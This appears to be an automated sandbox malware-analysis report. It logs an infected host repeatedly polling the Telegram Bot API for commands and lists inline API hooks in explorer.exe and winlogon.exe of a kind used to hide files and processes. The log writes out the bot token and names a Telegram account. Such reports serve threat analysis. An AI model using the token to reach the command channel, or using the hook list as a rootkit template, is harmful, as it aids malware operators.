                                                                                        2024-06-05 01:58:12 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        80192.168.2.449841149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:13 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:13 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:13 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:13 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        81192.168.2.449842149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:14 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:14 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:14 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:14 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        82192.168.2.449843149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:15 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:15 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:15 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:15 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        83192.168.2.449844149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:16 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:16 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:16 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:16 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        84192.168.2.449845149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:17 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:18 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:17 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:18 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        85192.168.2.449846149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:18 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:18 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:18 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:18 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        86192.168.2.449847149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:19 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:20 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:20 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:20 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        87192.168.2.449848149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:20 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:20 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:20 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:20 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        88192.168.2.449849149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:22 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:22 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:22 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:22 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        89192.168.2.449850149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:23 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:23 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:23 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:23 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        90192.168.2.449851149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:58:24 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:58:24 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:58:24 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:58:24 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Code Manipulations

                                                                                        Function NameHook TypeActive in Processes
                                                                                        ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                        NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                        ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                        NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                        ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                        NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                        NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                        ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                        ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                        NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                        RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                        NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                        NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                        ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                        ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                        Function NameHook TypeNew Data
                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
